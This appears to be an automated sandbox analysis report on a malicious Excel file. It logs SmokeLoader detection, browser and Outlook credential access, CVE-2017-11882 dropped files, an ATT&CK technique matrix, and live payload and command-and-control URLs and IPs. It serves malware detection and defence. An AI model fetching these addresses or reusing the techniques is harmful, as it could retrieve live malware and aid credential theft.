Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\times.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\containers.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\AlternateServices.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\pluginreg.dat
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\webappsstore.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\parent.lock
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\blocklist.xml

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO
Source: C:\Windows\SysWOW64\explorer.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.467103946.0000000000131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.467072313.0000000000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	11 Native API	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	53 Exploitation for Client Execution	1 DLL Side-Loading	623 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	11 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	21 Obfuscated Files or Information	1 Credentials in Registry	13 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 Install Root Certificate	NTDS	27 System Information Discovery	Distributed Component Object Model	11 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	331 Security Software Discovery	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	141 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	623 Process Injection	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#20240627_Edlen_A.xls	3%	ReversingLabs
#20240627_Edlen_A.xls	6%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Roaming\rugtucw	0%	ReversingLabs
C:\Users\user\AppData\Roaming\rugtucw	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
paste.ee	3%	Virustotal	Browse
z2.ink	4%	Virustotal	Browse
uploaddeimagens.com.br	5%	Virustotal	Browse
prolinice.ga	4%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
https://analytics.paste.ee	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://secure.gravatar.com	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://prolinice.ga/ndex.php	0%	Avira URL Cloud	safe
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://java.sun.com	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://198.46.177.156/8080/lionarekingofjungleimageshere.bmp	0%	Avira URL Cloud	safe
https://support.mozilla.org	0%	URL Reputation	safe
http://crl.use	0%	Avira URL Cloud	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://themes.googleusercontent.com	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://paste.ee/n	0%	Avira URL Cloud	safe
http://198.46.177.156/8080/RBG.txt	0%	Avira URL Cloud	safe
https://paste.ee/e	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://prolinice.ga/ndex.php	1%	Virustotal		Browse
http://198.46.177.156/8080/RBG.txt	8%	Virustotal		Browse
https://www.google.com	0%	Avira URL Cloud	safe
https://paste.ee/n	0%	Virustotal		Browse
http://aikpfjvjuwcsxfjs.net/application/x-www-form-urlencodedMozilla/5.0	0%	Avira URL Cloud	safe
https://paste.ee/e	2%	Virustotal		Browse
http://www.autoitscript.com/autoit3	0%	Avira URL Cloud	safe
http://aikpfjvjuwcsxfjs.net/	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://www.google.com	0%	Virustotal		Browse
http://prolinice.ga/index.php	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
http://z2.ink/	0%	Avira URL Cloud	safe
http://vilendar.ga/index.php	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com	0%	Virustotal		Browse
http://prolinice.ga/index.php.	0%	Avira URL Cloud	safe
http://www.piriform.com/ccleanerxe	0%	Avira URL Cloud	safe
http://prolinice.ga/index.php	2%	Virustotal		Browse
http://z2.ink/	4%	Virustotal		Browse
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634	100%	Avira URL Cloud	malware
http://vilendar.ga/index.php	0%	Virustotal		Browse
https://paste.ee/d/Bo3r4	0%	Avira URL Cloud	safe
http://prolinice.ga/	0%	Avira URL Cloud	safe
https://www.google.com;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634	13%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3	0%	Virustotal		Browse
https://paste.ee/d/Bo3r4gj	0%	Avira URL Cloud	safe
https://www.google.com/favicon.ico	0%	Avira URL Cloud	safe
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://prolinice.ga/	4%	Virustotal		Browse
http://www.piriform.com/ccleaner	0%	Avira URL Cloud	safe
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	0%	Virustotal		Browse
https://www.google.com/favicon.ico	0%	Virustotal		Browse
http://198.46.177.156/8080/lionarekingofjungleimageshere.bmpj	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	7%	Virustotal		Browse
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0	1%	Virustotal		Browse
http://prolinice.ga/index.phpMozilla/5.0	0%	Avira URL Cloud	safe
http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc	0%	Avira URL Cloud	safe
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
http://www.piriform.com/ccleaner	0%	Virustotal		Browse
http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc	8%	Virustotal		Browse
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Virustotal		Browse
http://prolinice.ga/index.phpMozilla/5.0	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paste.ee	188.114.96.3	true	true	3%, Virustotal, Browse	unknown
z2.ink	54.241.153.192	true	true	4%, Virustotal, Browse	unknown
uploaddeimagens.com.br	188.114.97.3	true	true	5%, Virustotal, Browse	unknown
prolinice.ga	77.232.129.190	true	true	4%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://198.46.177.156/8080/lionarekingofjungleimageshere.bmp	true	Avira URL Cloud: safe	unknown
http://198.46.177.156/8080/RBG.txt	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://prolinice.ga/index.php	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://vilendar.ga/index.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://paste.ee/d/Bo3r4	true	Avira URL Cloud: safe	unknown
http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://prolinice.ga/ndex.php	explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://crl.use	wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.ee/n	wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://analytics.paste.ee	wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://paste.ee/e	wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com	wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://aikpfjvjuwcsxfjs.net/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 0000000E.00000002.607048894.0000000007987000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aikpfjvjuwcsxfjs.net/	explorer.exe, 0000000E.00000002.606049641.00000000026D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.607048894.0000000007987000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3	explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com	wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com;	wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://z2.ink/	z2.ink.url.4.dr	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000A.00000002.528301367.000000000259A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.454053406.00000000022A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.gravatar.com	wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://prolinice.ga/index.php.	explorer.exe, 0000000E.00000002.606049641.00000000026D2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleanerxe	explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://prolinice.ga/	explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmp	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com;	wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000C.00000002.454053406.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	false	URL Reputation: safe	unknown
https://paste.ee/d/Bo3r4gj	wscript.exe, 00000009.00000003.419004224.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422008414.0000000000816000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/favicon.ico	F8D.tmp.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	false	URL Reputation: safe	unknown
http://java.sun.com	explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 0000000E.00000002.606556935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.00000000078D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.000000000797B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466511830.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.607048894.00000000078D0000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br	powershell.exe, 0000000C.00000002.454053406.00000000023DA000.00000004.00000800.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://analytics.paste.ee;	wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleaner	explorer.exe, 0000000E.00000002.606556935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.000000000797B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466511830.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://198.46.177.156/8080/lionarekingofjungleimageshere.bmpj	EQNEDT32.EXE, 00000008.00000002.412851161.00000000002EF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	explorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://prolinice.ga/index.phpMozilla/5.0	explorer.exe, 00000012.00000002.526156313.0000000000664000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.509224452.000000000032E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.513249224.0000000000604000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.605434995.00000000002C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.546090227.000000000013E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.605531849.0000000000684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.605475335.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.605633277.0000000000464000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.605402279.000000000033E000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	false	URL Reputation: safe	unknown
https://themes.googleusercontent.com	wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
